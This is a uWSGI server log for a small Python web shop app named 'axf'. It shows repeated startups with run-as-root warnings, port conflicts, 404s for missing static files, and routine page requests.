*** Starting uWSGI 2.0.18 (64bit) on [Wed Mar 13 14:50:32 2019] ***
compiled with version: 5.4.0 20160609 on 13 March 2019 06:42:24
os: Linux-4.4.0-142-generic #168-Ubuntu SMP Wed Jan 16 21:00:45 UTC 2019
nodename: iZwz9jf51n6nnlskuibatuZ
machine: x86_64
clock source: unix
detected number of CPU cores: 1
current working directory: /var/www/axf
writing pidfile to uwsgi.pid
detected binary path: /root/.virtualenv/axf/bin/uwsgi
!!! no internal routing support, rebuild with pcre support !!!
uWSGI running as root, you can use --uid/--gid/--chroot options
*** WARNING: you are running uWSGI as root !!! (use the --uid flag) *** 
chdir() to /var/www/axf
*** WARNING: you are running uWSGI without its master process manager ***
your processes number limit is 1801
your memory page size is 4096 bytes
detected max file descriptor number: 65535
lock engine: pthread robust mutexes
thunder lock: disabled (you can enable it with --thunder-lock)
uWSGI http bound on 0.0.0.0:8000 fd 4
spawned uWSGI http 1 (pid: 25815)
uwsgi socket 0 bound to TCP address 127.0.0.1:37190 (port auto-assigned) fd 3
uWSGI running as root, you can use --uid/--gid/--chroot options
*** WARNING: you are running uWSGI as root !!! (use the --uid flag) *** 
Python version: 3.5.2 (default, Nov 12 2018, 13:43:14)  [GCC 5.4.0 20160609]
Python main interpreter initialized at 0x139a4b0
uWSGI running as root, you can use --uid/--gid/--chroot options
*** WARNING: you are running uWSGI as root !!! (use the --uid flag) *** 
python threads support enabled
your server socket listen backlog is limited to 100 connections
your mercy for graceful operations on workers is 60 seconds
mapped 83344 bytes (81 KB) for 2 cores
*** Operational MODE: threaded ***
WSGI app 0 (mountpoint='') ready in 1 seconds on interpreter 0x139a4b0 pid: 25814 (default app)
uWSGI running as root, you can use --uid/--gid/--chroot options
*** WARNING: you are running uWSGI as root !!! (use the --uid flag) *** 
*** uWSGI is running in multiple interpreter mode ***
spawned uWSGI worker 1 (and the only) (pid: 25814, cores: 2)
[pid: 25814|app: 0|req: 1/1] 113.87.160.176 () {38 vars in 784 bytes} [Wed Mar 13 06:54:12 2019] GET /axf/ => generated 22501 bytes in 327 msecs (HTTP/1.1 200) 5 headers in 179 bytes (1 switches on core 0)
Not Found: /static/base/css/bootstrap.min.css.map
[pid: 25814|app: 0|req: 2/2] 113.88.14.120 () {34 vars in 744 bytes} [Wed Mar 13 06:54:15 2019] GET /static/base/css/bootstrap.min.css.map => generated 2147 bytes in 4 msecs (HTTP/1.1 404) 3 headers in 102 bytes (1 switches on core 1)
Not Found: /static/home/js/maps/swiper.min.js.map
[pid: 25814|app: 0|req: 3/3] 113.87.160.176 () {34 vars in 745 bytes} [Wed Mar 13 06:54:15 2019] GET /static/home/js/maps/swiper.min.js.map => generated 2147 bytes in 3 msecs (HTTP/1.1 404) 3 headers in 102 bytes (1 switches on core 0)
*** Starting uWSGI 2.0.18 (64bit) on [Wed Mar 13 14:56:21 2019] ***
compiled with version: 5.4.0 20160609 on 13 March 2019 06:42:24
os: Linux-4.4.0-142-generic #168-Ubuntu SMP Wed Jan 16 21:00:45 UTC 2019
nodename: iZwz9jf51n6nnlskuibatuZ
machine: x86_64
clock source: unix
detected number of CPU cores: 1
current working directory: /var/www/axf
writing pidfile to uwsgi.pid
detected binary path: /root/.virtualenv/axf/bin/uwsgi
!!! no internal routing support, rebuild with pcre support !!!
uWSGI running as root, you can use --uid/--gid/--chroot options
*** WARNING: you are running uWSGI as root !!! (use the --uid flag) *** 
chdir() to /var/www/axf
*** WARNING: you are running uWSGI without its master process manager ***
your processes number limit is 1801
your memory page size is 4096 bytes
detected max file descriptor number: 65535
lock engine: pthread robust mutexes
thunder lock: disabled (you can enable it with --thunder-lock)
uWSGI http bound on 0.0.0.0:8020 fd 4
spawned uWSGI http 1 (pid: 25832)
uwsgi socket 0 bound to TCP address 127.0.0.1:45584 (port auto-assigned) fd 3
uWSGI running as root, you can use --uid/--gid/--chroot options
*** WARNING: you are running uWSGI as root !!! (use the --uid flag) *** 
Python version: 3.5.2 (default, Nov 12 2018, 13:43:14)  [GCC 5.4.0 20160609]
Python main interpreter initialized at 0xe1b4b0
uWSGI running as root, you can use --uid/--gid/--chroot options
*** WARNING: you are running uWSGI as root !!! (use the --uid flag) *** 
python threads support enabled
your server socket listen backlog is limited to 100 connections
your mercy for graceful operations on workers is 60 seconds
mapped 83344 bytes (81 KB) for 2 cores
*** Operational MODE: threaded ***
WSGI app 0 (mountpoint='') ready in 0 seconds on interpreter 0xe1b4b0 pid: 25831 (default app)
uWSGI running as root, you can use --uid/--gid/--chroot options
*** WARNING: you are running uWSGI as root !!! (use the --uid flag) *** 
*** uWSGI is running in multiple interpreter mode ***
spawned uWSGI worker 1 (and the only) (pid: 25831, cores: 2)
[pid: 25831|app: 0|req: 1/1] 113.87.160.176 () {38 vars in 814 bytes} [Wed Mar 13 06:56:27 2019] GET /axf/ => generated 22501 bytes in 77 msecs (HTTP/1.1 200) 5 headers in 179 bytes (1 switches on core 0)
Not Found: /static/base/css/bootstrap.min3_3_7.css
[pid: 25831|app: 0|req: 2/2] 113.88.14.120 () {38 vars in 826 bytes} [Wed Mar 13 06:56:27 2019] GET /static/base/css/bootstrap.min3_3_7.css => generated 2150 bytes in 4 msecs (HTTP/1.1 404) 3 headers in 102 bytes (1 switches on core 1)
Not Found: /static/base/css/reset.css
[pid: 25831|app: 0|req: 3/3] 113.88.14.120 () {38 vars in 800 bytes} [Wed Mar 13 06:56:27 2019] GET /static/base/css/reset.css => generated 2111 bytes in 3 msecs (HTTP/1.1 404) 3 headers in 102 bytes (1 switches on core 0)
Not Found: /static/base/css/base.css
[pid: 25831|app: 0|req: 4/4] 113.88.14.120 () {38 vars in 798 bytes} [Wed Mar 13 06:56:27 2019] GET /static/base/css/base.css => generated 2108 bytes in 3 msecs (HTTP/1.1 404) 3 headers in 102 bytes (1 switches on core 1)
Not Found: /static/home/css/swiper.min.css
[pid: 25831|app: 0|req: 5/5] 113.88.14.120 () {38 vars in 810 bytes} [Wed Mar 13 06:56:27 2019] GET /static/home/css/swiper.min.css => generated 2126 bytes in 3 msecs (HTTP/1.1 404) 3 headers in 102 bytes (1 switches on core 0)
Not Found: /static/home/css/home.css
[pid: 25831|app: 0|req: 6/6] 113.87.160.176 () {38 vars in 799 bytes} [Wed Mar 13 06:56:27 2019] GET /static/home/css/home.css => generated 2108 bytes in 3 msecs (HTTP/1.1 404) 3 headers in 102 bytes (1 switches on core 1)
Not Found: /static/base/js/jquery.min_3.3.1.js
Not Found: /static/base/js/jquery.cookie1.4.1.js
[pid: 25831|app: 0|req: 8/7] 113.88.14.120 () {38 vars in 803 bytes} [Wed Mar 13 06:56:27 2019] GET /static/base/js/jquery.min_3.3.1.js => generated 2138 bytes in 7 msecs (HTTP/1.1 404) 3 headers in 102 bytes (1 switches on core 0)
[pid: 25831|app: 0|req: 8/8] 113.88.14.120 () {38 vars in 807 bytes} [Wed Mar 13 06:56:27 2019] GET /static/base/js/jquery.cookie1.4.1.js => generated 2144 bytes in 3 msecs (HTTP/1.1 404) 3 headers in 102 bytes (1 switches on core 1)
Not Found: /static/base/js/bootstrap.min3_3_7.js
[pid: 25831|app: 0|req: 9/9] 113.87.160.176 () {38 vars in 808 bytes} [Wed Mar 13 06:56:27 2019] GET /static/base/js/bootstrap.min3_3_7.js => generated 2144 bytes in 4 msecs (HTTP/1.1 404) 3 headers in 102 bytes (1 switches on core 0)
Not Found: /static/base/js/base.js
[pid: 25831|app: 0|req: 10/10] 113.87.160.176 () {38 vars in 780 bytes} [Wed Mar 13 06:56:27 2019] GET /static/base/js/base.js => generated 2102 bytes in 4 msecs (HTTP/1.1 404) 3 headers in 102 bytes (1 switches on core 1)
Not Found: /static/home/js/swiper.min.js
[pid: 25831|app: 0|req: 12/11] 113.88.14.120 () {38 vars in 791 bytes} [Wed Mar 13 06:56:27 2019] GET /static/home/js/swiper.min.js => generated 2120 bytes in 8 msecs (HTTP/1.1 404) 3 headers in 102 bytes (1 switches on core 0)
Not Found: /static/home/js/home.js
[pid: 25831|app: 0|req: 12/12] 113.87.160.176 () {38 vars in 780 bytes} [Wed Mar 13 06:56:27 2019] GET /static/home/js/home.js => generated 2102 bytes in 5 msecs (HTTP/1.1 404) 3 headers in 102 bytes (1 switches on core 1)
Not Found: /static/home/js/home.js
[pid: 25831|app: 0|req: 13/13] 113.88.14.120 () {38 vars in 779 bytes} [Wed Mar 13 06:56:27 2019] GET /static/home/js/home.js => generated 2102 bytes in 3 msecs (HTTP/1.1 404) 3 headers in 102 bytes (1 switches on core 0)
Not Found: /favicon.ico
[pid: 25831|app: 0|req: 14/14] 113.88.14.120 () {38 vars in 793 bytes} [Wed Mar 13 06:56:27 2019] GET /favicon.ico => generated 2069 bytes in 4 msecs (HTTP/1.1 404) 3 headers in 102 bytes (1 switches on core 1)
[pid: 25831|app: 0|req: 15/15] 113.88.14.120 () {40 vars in 844 bytes} [Wed Mar 13 06:56:29 2019] GET /axf/ => generated 22501 bytes in 2 msecs (HTTP/1.1 200) 5 headers in 179 bytes (1 switches on core 0)
Not Found: /static/base/css/bootstrap.min3_3_7.css
Not Found: /static/base/css/reset.css
[pid: 25831|app: 0|req: 17/16] 113.87.160.176 () {38 vars in 827 bytes} [Wed Mar 13 06:56:29 2019] GET /static/base/css/bootstrap.min3_3_7.css => generated 2150 bytes in 7 msecs (HTTP/1.1 404) 3 headers in 102 bytes (1 switches on core 1)
[pid: 25831|app: 0|req: 18/17] 113.87.160.176 () {38 vars in 801 bytes} [Wed Mar 13 06:56:29 2019] GET /static/base/css/reset.css => generated 2111 bytes in 6 msecs (HTTP/1.1 404) 3 headers in 102 bytes (1 switches on core 0)
Not Found: /static/base/css/base.css
Not Found: /static/home/css/swiper.min.css
[pid: 25831|app: 0|req: 19/19] 113.87.160.176 () {38 vars in 799 bytes} [Wed Mar 13 06:56:29 2019] GET /static/base/css/base.css => generated 2108 bytes in 6 msecs (HTTP/1.1 404) 3 headers in 102 bytes (1 switches on core 1)
[pid: 25831|app: 0|req: 20/19] 113.88.14.120 () {38 vars in 810 bytes} [Wed Mar 13 06:56:29 2019] GET /static/home/css/swiper.min.css => generated 2126 bytes in 3 msecs (HTTP/1.1 404) 3 headers in 102 bytes (1 switches on core 0)
Not Found: /static/home/css/home.css
[pid: 25831|app: 0|req: 20/20] 113.88.14.120 () {38 vars in 798 bytes} [Wed Mar 13 06:56:29 2019] GET /static/home/css/home.css => generated 2108 bytes in 2 msecs (HTTP/1.1 404) 3 headers in 102 bytes (1 switches on core 1)
Not Found: /static/base/js/base.js
[pid: 25831|app: 0|req: 22/21] 113.88.14.120 () {38 vars in 779 bytes} [Wed Mar 13 06:56:29 2019] GET /static/base/js/base.js => generated 2102 bytes in 8 msecs (HTTP/1.1 404) 3 headers in 102 bytes (1 switches on core 0)
Not Found: /static/base/js/jquery.min_3.3.1.js
[pid: 25831|app: 0|req: 23/22] 113.88.14.120 () {38 vars in 803 bytes} [Wed Mar 13 06:56:29 2019] GET /static/base/js/jquery.min_3.3.1.js => generated 2138 bytes in 7 msecs (HTTP/1.1 404) 3 headers in 102 bytes (1 switches on core 1)
Not Found: /static/base/js/bootstrap.min3_3_7.js
[pid: 25831|app: 0|req: 24/23] 113.87.160.176 () {38 vars in 808 bytes} [Wed Mar 13 06:56:29 2019] GET /static/base/js/bootstrap.min3_3_7.js => generated 2144 bytes in 6 msecs (HTTP/1.1 404) 3 headers in 102 bytes (1 switches on core 0)
Not Found: /static/base/js/jquery.cookie1.4.1.js
[pid: 25831|app: 0|req: 25/24] 113.88.14.120 () {38 vars in 807 bytes} [Wed Mar 13 06:56:29 2019] GET /static/base/js/jquery.cookie1.4.1.js => generated 2144 bytes in 6 msecs (HTTP/1.1 404) 3 headers in 102 bytes (1 switches on core 1)
Not Found: /static/home/js/home.js
Not Found: /static/home/js/swiper.min.js
[pid: 25831|app: 0|req: 26/25] 113.87.160.176 () {38 vars in 792 bytes} [Wed Mar 13 06:56:29 2019] GET /static/home/js/swiper.min.js => generated 2120 bytes in 6 msecs (HTTP/1.1 404) 3 headers in 102 bytes (1 switches on core 0)
[pid: 25831|app: 0|req: 26/26] 113.88.14.120 () {38 vars in 779 bytes} [Wed Mar 13 06:56:29 2019] GET /static/home/js/home.js => generated 2102 bytes in 3 msecs (HTTP/1.1 404) 3 headers in 102 bytes (1 switches on core 1)
Not Found: /static/base/js/bootstrap.min3_3_7.js
[pid: 25831|app: 0|req: 27/27] 113.88.14.120 () {38 vars in 805 bytes} [Wed Mar 13 06:56:29 2019] GET /static/base/js/bootstrap.min3_3_7.js => generated 2144 bytes in 4 msecs (HTTP/1.1 404) 3 headers in 102 bytes (1 switches on core 0)
Not Found: /static/base/js/base.js
[pid: 25831|app: 0|req: 28/28] 113.88.14.120 () {38 vars in 777 bytes} [Wed Mar 13 06:56:29 2019] GET /static/base/js/base.js => generated 2102 bytes in 4 msecs (HTTP/1.1 404) 3 headers in 102 bytes (1 switches on core 1)
Not Found: /static/home/js/swiper.min.js
[pid: 25831|app: 0|req: 29/29] 113.87.160.176 () {38 vars in 791 bytes} [Wed Mar 13 06:56:29 2019] GET /static/home/js/swiper.min.js => generated 2120 bytes in 3 msecs (HTTP/1.1 404) 3 headers in 102 bytes (1 switches on core 0)
Not Found: /static/home/js/home.js
[pid: 25831|app: 0|req: 30/30] 113.87.160.176 () {38 vars in 779 bytes} [Wed Mar 13 06:56:29 2019] GET /static/home/js/home.js => generated 2102 bytes in 3 msecs (HTTP/1.1 404) 3 headers in 102 bytes (1 switches on core 1)
[pid: 25831|app: 0|req: 31/31] 113.88.14.120 () {40 vars in 844 bytes} [Wed Mar 13 06:56:32 2019] GET /axf/ => generated 22501 bytes in 1 msecs (HTTP/1.1 200) 5 headers in 179 bytes (1 switches on core 0)
Not Found: /static/base/css/bootstrap.min3_3_7.css
Not Found: /static/base/css/reset.css
[pid: 25831|app: 0|req: 33/32] 113.87.160.176 () {38 vars in 800 bytes} [Wed Mar 13 06:56:32 2019] GET /static/base/css/reset.css => generated 2111 bytes in 7 msecs (HTTP/1.1 404) 3 headers in 102 bytes (1 switches on core 0)
[pid: 25831|app: 0|req: 33/33] 113.88.14.120 () {38 vars in 825 bytes} [Wed Mar 13 06:56:32 2019] GET /static/base/css/bootstrap.min3_3_7.css => generated 2150 bytes in 8 msecs (HTTP/1.1 404) 3 headers in 102 bytes (1 switches on core 1)
Not Found: /static/base/css/base.css
Not Found: /static/home/css/swiper.min.css
[pid: 25831|app: 0|req: 35/34] 113.87.160.176 () {38 vars in 811 bytes} [Wed Mar 13 06:56:32 2019] GET /static/home/css/swiper.min.css => generated 2126 bytes in 6 msecs (HTTP/1.1 404) 3 headers in 102 bytes (1 switches on core 1)
[pid: 25831|app: 0|req: 36/35] 113.87.160.176 () {38 vars in 799 bytes} [Wed Mar 13 06:56:32 2019] GET /static/base/css/base.css => generated 2108 bytes in 9 msecs (HTTP/1.1 404) 3 headers in 102 bytes (1 switches on core 0)
Not Found: /static/home/css/home.css
[pid: 25831|app: 0|req: 36/36] 113.88.14.120 () {38 vars in 797 bytes} [Wed Mar 13 06:56:32 2019] GET /static/home/css/home.css => generated 2108 bytes in 3 msecs (HTTP/1.1 404) 3 headers in 102 bytes (1 switches on core 1)
Not Found: /static/base/js/jquery.min_3.3.1.js
[pid: 25831|app: 0|req: 38/37] 113.88.14.120 () {38 vars in 803 bytes} [Wed Mar 13 06:56:32 2019] GET /static/base/js/jquery.min_3.3.1.js => generated 2138 bytes in 7 msecs (HTTP/1.1 404) 3 headers in 102 bytes (1 switches on core 0)
Not Found: /static/base/js/jquery.cookie1.4.1.js
[pid: 25831|app: 0|req: 39/38] 113.88.14.120 () {38 vars in 807 bytes} [Wed Mar 13 06:56:32 2019] GET /static/base/js/jquery.cookie1.4.1.js => generated 2144 bytes in 7 msecs (HTTP/1.1 404) 3 headers in 102 bytes (1 switches on core 1)
Not Found: /static/base/js/bootstrap.min3_3_7.js
[pid: 25831|app: 0|req: 40/39] 113.87.160.176 () {38 vars in 808 bytes} [Wed Mar 13 06:56:32 2019] GET /static/base/js/bootstrap.min3_3_7.js => generated 2144 bytes in 6 msecs (HTTP/1.1 404) 3 headers in 102 bytes (1 switches on core 0)
Not Found: /static/home/js/swiper.min.js
Not Found: /static/base/js/base.js
[pid: 25831|app: 0|req: 41/40] 113.88.14.120 () {38 vars in 779 bytes} [Wed Mar 13 06:56:32 2019] GET /static/base/js/base.js => generated 2102 bytes in 5 msecs (HTTP/1.1 404) 3 headers in 102 bytes (1 switches on core 1)
Not Found: /static/home/js/home.js
[pid: 25831|app: 0|req: 42/41] 113.87.160.176 () {38 vars in 792 bytes} [Wed Mar 13 06:56:32 2019] GET /static/home/js/swiper.min.js => generated 2120 bytes in 5 msecs (HTTP/1.1 404) 3 headers in 102 bytes (1 switches on core 0)
[pid: 25831|app: 0|req: 42/42] 113.88.14.120 () {38 vars in 779 bytes} [Wed Mar 13 06:56:32 2019] GET /static/home/js/home.js => generated 2102 bytes in 3 msecs (HTTP/1.1 404) 3 headers in 102 bytes (1 switches on core 1)
Not Found: /static/home/js/swiper.min.js
[pid: 25831|app: 0|req: 43/43] 113.88.14.120 () {38 vars in 791 bytes} [Wed Mar 13 06:56:32 2019] GET /static/home/js/swiper.min.js => generated 2120 bytes in 4 msecs (HTTP/1.1 404) 3 headers in 102 bytes (1 switches on core 0)
Not Found: /static/home/js/home.js
[pid: 25831|app: 0|req: 44/44] 113.88.14.120 () {38 vars in 779 bytes} [Wed Mar 13 06:56:32 2019] GET /static/home/js/home.js => generated 2102 bytes in 5 msecs (HTTP/1.1 404) 3 headers in 102 bytes (1 switches on core 1)
*** Starting uWSGI 2.0.18 (64bit) on [Wed Mar 13 15:08:28 2019] ***
compiled with version: 5.4.0 20160609 on 13 March 2019 06:42:24
os: Linux-4.4.0-142-generic #168-Ubuntu SMP Wed Jan 16 21:00:45 UTC 2019
nodename: iZwz9jf51n6nnlskuibatuZ
machine: x86_64
clock source: unix
detected number of CPU cores: 1
current working directory: /var/www/axf
writing pidfile to uwsgi.pid
detected binary path: /root/.virtualenv/axf/bin/uwsgi
!!! no internal routing support, rebuild with pcre support !!!
uWSGI running as root, you can use --uid/--gid/--chroot options
*** WARNING: you are running uWSGI as root !!! (use the --uid flag) *** 
chdir() to /var/www/axf
*** WARNING: you are running uWSGI without its master process manager ***
your processes number limit is 1801
your memory page size is 4096 bytes
detected max file descriptor number: 65535
lock engine: pthread robust mutexes
thunder lock: disabled (you can enable it with --thunder-lock)
uWSGI running as root, you can use --uid/--gid/--chroot options
*** WARNING: you are running uWSGI as root !!! (use the --uid flag) *** 
uWSGI running as root, you can use --uid/--gid/--chroot options
*** WARNING: you are running uWSGI as root !!! (use the --uid flag) *** 
The -s/--socket option is missing and stdin is not a socket.
*** Starting uWSGI 2.0.18 (64bit) on [Wed Mar 13 15:10:21 2019] ***
compiled with version: 5.4.0 20160609 on 13 March 2019 06:42:24
os: Linux-4.4.0-142-generic #168-Ubuntu SMP Wed Jan 16 21:00:45 UTC 2019
nodename: iZwz9jf51n6nnlskuibatuZ
machine: x86_64
clock source: unix
detected number of CPU cores: 1
current working directory: /var/www/axf
writing pidfile to uwsgi.pid
detected binary path: /root/.virtualenv/axf/bin/uwsgi
!!! no internal routing support, rebuild with pcre support !!!
uWSGI running as root, you can use --uid/--gid/--chroot options
*** WARNING: you are running uWSGI as root !!! (use the --uid flag) *** 
chdir() to /var/www/axf
*** WARNING: you are running uWSGI without its master process manager ***
your processes number limit is 1801
your memory page size is 4096 bytes
detected max file descriptor number: 65535
lock engine: pthread robust mutexes
thunder lock: disabled (you can enable it with --thunder-lock)
uWSGI running as root, you can use --uid/--gid/--chroot options
*** WARNING: you are running uWSGI as root !!! (use the --uid flag) *** 
uWSGI running as root, you can use --uid/--gid/--chroot options
*** WARNING: you are running uWSGI as root !!! (use the --uid flag) *** 
The -s/--socket option is missing and stdin is not a socket.
*** Starting uWSGI 2.0.18 (64bit) on [Wed Mar 13 15:12:31 2019] ***
compiled with version: 5.4.0 20160609 on 13 March 2019 06:42:24
os: Linux-4.4.0-142-generic #168-Ubuntu SMP Wed Jan 16 21:00:45 UTC 2019
nodename: iZwz9jf51n6nnlskuibatuZ
machine: x86_64
clock source: unix
detected number of CPU cores: 1
current working directory: /var/www/axf
writing pidfile to uwsgi.pid
detected binary path: /root/.virtualenv/axf/bin/uwsgi
!!! no internal routing support, rebuild with pcre support !!!
uWSGI running as root, you can use --uid/--gid/--chroot options
*** WARNING: you are running uWSGI as root !!! (use the --uid flag) *** 
chdir() to /var/www/axf
*** WARNING: you are running uWSGI without its master process manager ***
your processes number limit is 1801
your memory page size is 4096 bytes
detected max file descriptor number: 65535
lock engine: pthread robust mutexes
thunder lock: disabled (you can enable it with --thunder-lock)
uWSGI running as root, you can use --uid/--gid/--chroot options
*** WARNING: you are running uWSGI as root !!! (use the --uid flag) *** 
uWSGI running as root, you can use --uid/--gid/--chroot options
*** WARNING: you are running uWSGI as root !!! (use the --uid flag) *** 
The -s/--socket option is missing and stdin is not a socket.
*** Starting uWSGI 2.0.18 (64bit) on [Wed Mar 13 15:14:48 2019] ***
compiled with version: 5.4.0 20160609 on 13 March 2019 06:42:24
os: Linux-4.4.0-142-generic #168-Ubuntu SMP Wed Jan 16 21:00:45 UTC 2019
nodename: iZwz9jf51n6nnlskuibatuZ
machine: x86_64
clock source: unix
detected number of CPU cores: 1
current working directory: /var/www/axf
writing pidfile to uwsgi.pid
detected binary path: /root/.virtualenv/axf/bin/uwsgi
!!! no internal routing support, rebuild with pcre support !!!
uWSGI running as root, you can use --uid/--gid/--chroot options
*** WARNING: you are running uWSGI as root !!! (use the --uid flag) *** 
chdir() to /var/www/axf
*** WARNING: you are running uWSGI without its master process manager ***
your processes number limit is 1801
your memory page size is 4096 bytes
detected max file descriptor number: 65535
lock engine: pthread robust mutexes
thunder lock: disabled (you can enable it with --thunder-lock)
uwsgi socket 0 bound to TCP address 0.0.0.0:8030 fd 3
uWSGI running as root, you can use --uid/--gid/--chroot options
*** WARNING: you are running uWSGI as root !!! (use the --uid flag) *** 
Python version: 3.5.2 (default, Nov 12 2018, 13:43:14)  [GCC 5.4.0 20160609]
*** Python threads support is disabled. You can enable it with --enable-threads ***
Python main interpreter initialized at 0x14cc3f0
uWSGI running as root, you can use --uid/--gid/--chroot options
*** WARNING: you are running uWSGI as root !!! (use the --uid flag) *** 
your server socket listen backlog is limited to 100 connections
your mercy for graceful operations on workers is 60 seconds
mapped 72904 bytes (71 KB) for 1 cores
*** Operational MODE: single process ***
WSGI app 0 (mountpoint='') ready in 0 seconds on interpreter 0x14cc3f0 pid: 26011 (default app)
uWSGI running as root, you can use --uid/--gid/--chroot options
*** WARNING: you are running uWSGI as root !!! (use the --uid flag) *** 
*** uWSGI is running in multiple interpreter mode ***
spawned uWSGI worker 1 (and the only) (pid: 26011, cores: 1)
*** Starting uWSGI 2.0.18 (64bit) on [Wed Mar 13 15:14:55 2019] ***
compiled with version: 5.4.0 20160609 on 13 March 2019 06:42:24
os: Linux-4.4.0-142-generic #168-Ubuntu SMP Wed Jan 16 21:00:45 UTC 2019
nodename: iZwz9jf51n6nnlskuibatuZ
machine: x86_64
clock source: unix
detected number of CPU cores: 1
current working directory: /var/www/axf
writing pidfile to uwsgi.pid
detected binary path: /root/.virtualenv/axf/bin/uwsgi
!!! no internal routing support, rebuild with pcre support !!!
uWSGI running as root, you can use --uid/--gid/--chroot options
*** WARNING: you are running uWSGI as root !!! (use the --uid flag) *** 
chdir() to /var/www/axf
*** WARNING: you are running uWSGI without its master process manager ***
your processes number limit is 1801
your memory page size is 4096 bytes
detected max file descriptor number: 65535
lock engine: pthread robust mutexes
thunder lock: disabled (you can enable it with --thunder-lock)
probably another instance of uWSGI is running on the same address (0.0.0.0:8030).
bind(): Address already in use [core/socket.c line 769]
*** Starting uWSGI 2.0.18 (64bit) on [Wed Mar 13 15:15:04 2019] ***
compiled with version: 5.4.0 20160609 on 13 March 2019 06:42:24
os: Linux-4.4.0-142-generic #168-Ubuntu SMP Wed Jan 16 21:00:45 UTC 2019
nodename: iZwz9jf51n6nnlskuibatuZ
machine: x86_64
clock source: unix
detected number of CPU cores: 1
current working directory: /var/www/axf
writing pidfile to uwsgi.pid
detected binary path: /root/.virtualenv/axf/bin/uwsgi
!!! no internal routing support, rebuild with pcre support !!!
uWSGI running as root, you can use --uid/--gid/--chroot options
*** WARNING: you are running uWSGI as root !!! (use the --uid flag) *** 
chdir() to /var/www/axf
*** WARNING: you are running uWSGI without its master process manager ***
your processes number limit is 1801
your memory page size is 4096 bytes
detected max file descriptor number: 65535
lock engine: pthread robust mutexes
thunder lock: disabled (you can enable it with --thunder-lock)
uwsgi socket 0 bound to TCP address 0.0.0.0:8030 fd 3
uWSGI running as root, you can use --uid/--gid/--chroot options
*** WARNING: you are running uWSGI as root !!! (use the --uid flag) *** 
Python version: 3.5.2 (default, Nov 12 2018, 13:43:14)  [GCC 5.4.0 20160609]
*** Python threads support is disabled. You can enable it with --enable-threads ***
Python main interpreter initialized at 0x22e13f0
uWSGI running as root, you can use --uid/--gid/--chroot options
*** WARNING: you are running uWSGI as root !!! (use the --uid flag) *** 
your server socket listen backlog is limited to 100 connections
your mercy for graceful operations on workers is 60 seconds
mapped 72904 bytes (71 KB) for 1 cores
*** Operational MODE: single process ***
WSGI app 0 (mountpoint='') ready in 1 seconds on interpreter 0x22e13f0 pid: 26024 (default app)
uWSGI running as root, you can use --uid/--gid/--chroot options
*** WARNING: you are running uWSGI as root !!! (use the --uid flag) *** 
*** uWSGI is running in multiple interpreter mode ***
spawned uWSGI worker 1 (and the only) (pid: 26024, cores: 1)
[pid: 26024|app: 0|req: 1/1] 113.88.14.120 () {44 vars in 865 bytes} [Wed Mar 13 07:15:06 2019] GET /axf => generated 0 bytes in 16 msecs (HTTP/1.1 301) 3 headers in 110 bytes (1 switches on core 0)
[pid: 26024|app: 0|req: 2/2] 113.88.14.120 () {44 vars in 867 bytes} [Wed Mar 13 07:15:06 2019] GET /axf/ => generated 22501 bytes in 61 msecs (HTTP/1.1 200) 5 headers in 179 bytes (1 switches on core 0)
Not Found: /favicon.ico
[pid: 26024|app: 0|req: 3/3] 113.87.160.176 () {42 vars in 812 bytes} [Wed Mar 13 07:15:09 2019] GET /favicon.ico => generated 2064 bytes in 4 msecs (HTTP/1.1 404) 3 headers in 102 bytes (1 switches on core 0)
[pid: 26024|app: 0|req: 4/4] 113.87.160.176 () {44 vars in 868 bytes} [Wed Mar 13 07:22:28 2019] GET /axf/ => generated 22501 bytes in 22 msecs (HTTP/1.1 200) 5 headers in 179 bytes (1 switches on core 0)
[pid: 26024|app: 0|req: 5/5] 113.87.160.176 () {44 vars in 868 bytes} [Wed Mar 13 07:22:29 2019] GET /axf/ => generated 22501 bytes in 1 msecs (HTTP/1.1 200) 5 headers in 179 bytes (1 switches on core 0)
[pid: 26024|app: 0|req: 6/6] 113.87.160.176 () {44 vars in 868 bytes} [Wed Mar 13 07:22:30 2019] GET /axf/ => generated 22501 bytes in 1 msecs (HTTP/1.1 200) 5 headers in 179 bytes (1 switches on core 0)
[pid: 26024|app: 0|req: 7/7] 113.87.160.176 () {44 vars in 893 bytes} [Wed Mar 13 07:22:34 2019] GET /axf/market/ => generated 10768 bytes in 31 msecs (HTTP/1.1 200) 4 headers in 125 bytes (1 switches on core 0)
[pid: 26024|app: 0|req: 8/8] 113.87.160.176 () {44 vars in 896 bytes} [Wed Mar 13 07:22:35 2019] GET /axf/cart/ => generated 2387 bytes in 10 msecs (HTTP/1.1 200) 4 headers in 124 bytes (1 switches on core 0)
[pid: 26024|app: 0|req: 9/9] 113.88.14.120 () {40 vars in 668 bytes} [Wed Mar 13 07:22:47 2019] GET /axf/ => generated 22501 bytes in 1 msecs (HTTP/1.1 200) 5 headers in 179 bytes (1 switches on core 0)
Not Found: /favicon.ico
[pid: 26024|app: 0|req: 10/10] 113.88.14.120 () {40 vars in 643 bytes} [Wed Mar 13 07:22:49 2019] GET /favicon.ico => generated 2064 bytes in 3 msecs (HTTP/1.1 404) 3 headers in 102 bytes (1 switches on core 0)
[pid: 26024|app: 0|req: 11/11] 113.88.14.120 () {42 vars in 720 bytes} [Wed Mar 13 07:22:53 2019] GET /axf/ => generated 22501 bytes in 1 msecs (HTTP/1.1 200) 5 headers in 179 bytes (1 switches on core 0)
[pid: 26024|app: 0|req: 12/12] 113.88.14.120 () {42 vars in 720 bytes} [Wed Mar 13 07:22:54 2019] GET /axf/ => generated 22501 bytes in 1 msecs (HTTP/1.1 200) 5 headers in 179 bytes (1 switches on core 0)
[pid: 26024|app: 0|req: 13/13] 113.88.14.120 () {42 vars in 720 bytes} [Wed Mar 13 07:23:01 2019] GET /axf/ => generated 22501 bytes in 2 msecs (HTTP/1.1 200) 5 headers in 179 bytes (1 switches on core 0)
[pid: 26024|app: 0|req: 14/14] 113.88.14.120 () {42 vars in 721 bytes} [Wed Mar 13 07:23:11 2019] GET /axf/ => generated 22501 bytes in 1 msecs (HTTP/1.1 200) 5 headers in 179 bytes (1 switches on core 0)
[pid: 26024|app: 0|req: 15/15] 113.88.14.120 () {42 vars in 742 bytes} [Wed Mar 13 07:23:12 2019] GET /axf/mine/ => generated 4999 bytes in 6 msecs (HTTP/1.1 200) 4 headers in 124 bytes (1 switches on core 0)
[pid: 26024|app: 0|req: 16/16] 113.88.14.120 () {42 vars in 747 bytes} [Wed Mar 13 07:23:13 2019] GET /axf/cart/ => generated 942 bytes in 4 msecs (HTTP/1.1 200) 4 headers in 123 bytes (1 switches on core 0)
